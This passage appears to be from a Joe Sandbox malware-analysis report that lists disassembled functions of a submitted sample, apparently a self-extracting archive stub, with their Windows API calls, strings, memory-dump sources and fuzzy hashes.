CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0059ABC5,00000008,?,00000000,?,0059CB88,?,00000000), ref: 005A06FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0059ABC5,00000008,?,00000000,?,0059CB88,?,00000000), ref: 005A070D

Strings

Thread pool initialization failed., xrefs: 005A0725

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: cf1aa3687ee6b5798cd171983cd42ceba1600dddb141d2fd9281ee9045e8541b
Instruction ID: d1af530771bc09c05cede6769858f36d7d01d3dc36c9dbf8d36036a4099e2a99
Opcode Fuzzy Hash: cf1aa3687ee6b5798cd171983cd42ceba1600dddb141d2fd9281ee9045e8541b
Instruction Fuzzy Hash: C91170B1500709AFC3315F65D888AABFFECFBA9754F10482EF1DA83240D6716984CB60

Function 005AD38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 005AD3C9, 005AD3FD
RENAMEDLG, xrefs: 005AD3DE

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 1127ec5461833de978f4c6eced9abaab59dad313e87b20a10d5b85a4899d3f50
Instruction ID: 00079f3fdd75597ae8244b128afdf705ed31a1961660ebfc55e49d3c03a58184
Opcode Fuzzy Hash: 1127ec5461833de978f4c6eced9abaab59dad313e87b20a10d5b85a4899d3f50
Instruction Fuzzy Hash: 74018071501249AFDF219F58ED44F6A3FA9F72A384B000827F506D2630C6B19C58FBB1

Function 005B91DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 005B9269
__alldvrm.LIBCMT ref: 005B946A
__alldvrm.LIBCMT ref: 005B948C

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction ID: dca46b38b7aaf054f8ad8323ace5d2d39504c3657960a55277faf005a9ec8dd4
Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction Fuzzy Hash: D7A15671900786AFDB21CF68C8927FEBFE5FF56310F18456DE6859B282C238A942C750

Function 0059A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,005980B7,?,?,?), ref: 0059A351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,005980B7,?,?), ref: 0059A395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,005980B7,?,?,?,?,?,?,?,?), ref: 0059A416
CloseHandle.KERNEL32(?,?,00000000,?,005980B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0059A41D

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 0a7c1893cb855cad2165704cc63a413449d2566190f18c3668c77a69b9eb0981
Instruction ID: 75d2dd78c8cf6568de785f12ecdbd86f1bc43a9f736fd43d41b1400b26f37cf5
Opcode Fuzzy Hash: 0a7c1893cb855cad2165704cc63a413449d2566190f18c3668c77a69b9eb0981
Instruction Fuzzy Hash: 7541CC31248385AAEB21DF24DC49FAEBBE8BB91700F140D1DB5D093181D6689A48DBA3

Function 005BC099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,005B89AD,?,00000000,?,00000001,?,?,00000001,005B89AD,?), ref: 005BC0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005BC16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,005B67E2,?), ref: 005BC181
__freea.LIBCMT ref: 005BC18A

Part of subcall function 005B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005BC13D,00000000,?,005B67E2,?,00000008,?,005B89AD,?,?,?), ref: 005B854A

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: f1f83eb858376e2261e036ba151551c7eab3da3e2be3352baa9592d501015aec
Instruction ID: 9cefd1b229de38d833b413406e212fb39d65ffc8b804db5db1fbbaceefaa9188
Opcode Fuzzy Hash: f1f83eb858376e2261e036ba151551c7eab3da3e2be3352baa9592d501015aec
Instruction Fuzzy Hash: 8131BC72A0020AAFDB249F69DC45DEE7FA9FB40710F144168FC15E6251EB35ED54CBA0

Function 005A9DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 005A9DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 005A9DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 005A9DDB
ReleaseDC.USER32(00000000,00000000), ref: 005A9DE9

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: faede2aea9d881b5e3e9c2f29171b0a8337529186d62e6eca2c8c866e88e8993
Instruction ID: 39899fd8bc0f5f40c78270fbd99c4bad5c8bfee90d85a4c7ed368efd1be1276c
Opcode Fuzzy Hash: faede2aea9d881b5e3e9c2f29171b0a8337529186d62e6eca2c8c866e88e8993
Instruction Fuzzy Hash: A4E0EC72986621A7D7601BA5AC0DBAF3F58EB29712F05000AF605D6190DE784449EB94

Function 005B2016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 005B2016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 005B201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 005B2020

Part of subcall function 005B310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 005B311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 005B2035

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: e27edabb4e27910c902491c8fe5f0ab47181088705d063c217ef9f799b15ec44
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: 0AC04C2400464BD41E117ABA210E1FD1F443CE27C4FD225C6E88037103DE06360ADA32

Function 005A9F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 005A9DF1: GetDC.USER32(00000000), ref: 005A9DF5
Part of subcall function 005A9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 005A9E00
Part of subcall function 005A9DF1: ReleaseDC.USER32(00000000,00000000), ref: 005A9E0B

GetObjectW.GDI32(?,00000018,?), ref: 005A9F8D

Part of subcall function 005AA1E5: GetDC.USER32(00000000), ref: 005AA1EE
Part of subcall function 005AA1E5: GetObjectW.GDI32(?,00000018,?), ref: 005AA21D
Part of subcall function 005AA1E5: ReleaseDC.USER32(00000000,?), ref: 005AA2B5

Strings

(, xrefs: 005AA0A3

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 340e989a14a04dd677a5f6db105b2389f0031bb9b9ffffb3e7a8f59973ef060f
Instruction ID: 8fb2dcaeae6632c799f80013970812d07b87d8a2d0c2d8b52c2f8f561307fa79
Opcode Fuzzy Hash: 340e989a14a04dd677a5f6db105b2389f0031bb9b9ffffb3e7a8f59973ef060f
Instruction Fuzzy Hash: B78124B5208614AFC714DF68C844D2ABBF9FF99700F00892DF98AD7260DB31AD05DB52

Function 005A0E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 005A0FF1

Strings

%s: %s, xrefs: 005A1000
%ls, xrefs: 005A0E76, 005A0E8C

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: b1122f2aee8ff9811736af150326bd1483e357952252cd31e0b497dfad099f13
Instruction ID: 6bf318de02d0ac259fa9ba246ab6d70d379b6e6a8d3f24a305dd3515fa594875
Opcode Fuzzy Hash: b1122f2aee8ff9811736af150326bd1483e357952252cd31e0b497dfad099f13
Instruction Fuzzy Hash: 4C51F83119CB41FEEE301AA4DD1AF3E7E69B747B01F204D06B7DB788D1C69254A0B616

Function 005BA918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005BAA84

Part of subcall function 005B8849: IsProcessorFeaturePresent.KERNEL32(00000017,005B8838,00000050,005C3958,?,0059CFE0,00000004,005D0EE8,?,?,005B8845,00000000,00000000,00000000,00000000,00000000), ref: 005B884B
Part of subcall function 005B8849: GetCurrentProcess.KERNEL32(C0000417,005C3958,00000050,005D0EE8), ref: 005B886D
Part of subcall function 005B8849: TerminateProcess.KERNEL32(00000000), ref: 005B8874

Strings

., xrefs: 005BAC3B
*?, xrefs: 005BA95B

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction ID: f2cbffd591a238c2c93d95914ac38240278f5acd7204de5191c316c29d991f77
Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction Fuzzy Hash: 61517F71E0020AAFDF14DFA8C981AEDBBF5FF98310F25816AE455A7340E631AE01DB51

Function 0059772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00597730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 005978CC

Part of subcall function 0059A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0059A27A,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A458
Part of subcall function 0059A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0059A27A,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A489

Strings

:, xrefs: 005977A1

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: c7f3d90ab6f377886d288a0b14ec40d67b8534f6b98591a92b8f4af3e61ba2f9
Instruction ID: dd841e6c3a68b25a1d8488eb3c12cb8b8b140d92f87ee62d3ac17497676f496c
Opcode Fuzzy Hash: c7f3d90ab6f377886d288a0b14ec40d67b8534f6b98591a92b8f4af3e61ba2f9
Instruction Fuzzy Hash: 2C41637190515DAADF20EB54CD59EEEBBBCFF85300F00409AB509A2092DB745F84CF61

Function 0059B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

UNC, xrefs: 0059B708
\\?\, xrefs: 0059B6BE, 0059B6FA, 0059B75B, 0059B7AE

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 037df35ab0b77e3a8f2a2b9cf87927a2033d1f4673c76591ac94bd7c1b848d43
Instruction ID: 73b78f8ca54e9c0958d1de3ad9160214a6e2512163ca47f5a1b713338bd85a03
Opcode Fuzzy Hash: 037df35ab0b77e3a8f2a2b9cf87927a2033d1f4673c76591ac94bd7c1b848d43
Instruction Fuzzy Hash: F241913580021AAAFF20AFA1ED45EEF7FADFF85790B104525F814A7152E770EA41CB60

Function 005A4230 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 005A43D8

Strings

XC\, xrefs: 005A4379
HC\, xrefs: 005A4345

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Exception@8Throw
String ID: HC\$XC\
API String ID: 2005118841-1792145424
Opcode ID: 6b80de36b0ac0743caf664fac692bed0d35e0771b0f1084286455bf5b853e37d
Instruction ID: c7285bbef7191e38e461289585205d068af1f2bc3e4b9a4baa60e0ef80b53962
Opcode Fuzzy Hash: 6b80de36b0ac0743caf664fac692bed0d35e0771b0f1084286455bf5b853e37d
Instruction Fuzzy Hash: 8B416A746007018FD714DF68D896BAABBE5FFD9300F05482EE99AC7251EB72E858CB41

Function 005A8FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 005A8FC4

Strings

about:blank, xrefs: 005A9082
Shell.Explorer, xrefs: 005A8FEF

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 3c3ce9bd7ab14c66399e43a40bf09c8998621be912ce1adbdb3f05fd0e3e693f
Instruction ID: 28d8e03a8fcd9ac39e0c65189fb00eb127dd8269bc3f448f123e42b39a61db47
Opcode Fuzzy Hash: 3c3ce9bd7ab14c66399e43a40bf09c8998621be912ce1adbdb3f05fd0e3e693f
Instruction Fuzzy Hash: 1F2160712143159FDB089F64C899E6E7FA9FF85751B14C56EF9098B282DB70EC01CB60

Function 005AD44D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,00010406,005AA990,?,?), ref: 005AD4C5

Strings

xj^, xrefs: 005AD4D5
GETPASSWORD1, xrefs: 005AD4BA

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$xj^
API String ID: 665744214-3588992345
Opcode ID: 1c0e6f903dfa260e13558800df1a711c989e6f7c584e1a43eb7c98a0c6bc472b
Instruction ID: e54a61b4f510ee2e80d3d3e43f7bf2bfa56accc180b37a01527d6be0c2915544
Opcode Fuzzy Hash: 1c0e6f903dfa260e13558800df1a711c989e6f7c584e1a43eb7c98a0c6bc472b
Instruction Fuzzy Hash: 941129726002456BDF22EE349C06BAE3FA8B70A755F044066BD46A7191CAF06C44D760

Function 0059EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 0059EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0059EB92
Part of subcall function 0059EB73: GetProcAddress.KERNEL32(005D81C0,CryptUnprotectMemory), ref: 0059EBA2

GetCurrentProcessId.KERNEL32(?,?,?,0059EBEC), ref: 0059EC84

Strings

CryptProtectMemory failed, xrefs: 0059EC3B
CryptUnprotectMemory failed, xrefs: 0059EC7C

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 0f1a1f587a04447d34ae8b37df543df4c79ede7c1a8685bd8d5a075cd822ca29
Instruction ID: 0623c0dabb1e7b1c140b410fc598b9dd3f074c8eadab5511f4b5e40eb272d756
Opcode Fuzzy Hash: 0f1a1f587a04447d34ae8b37df543df4c79ede7c1a8685bd8d5a075cd822ca29
Instruction Fuzzy Hash: B6112931A05629AFDF25DB34DD0BAAE7F54FF40710B04801AFC45AB282DB359E4597D4

Function 005B9B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005B9BBE
_free.LIBCMT ref: 005B9BE4

Strings

X\, xrefs: 005B9C4B

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
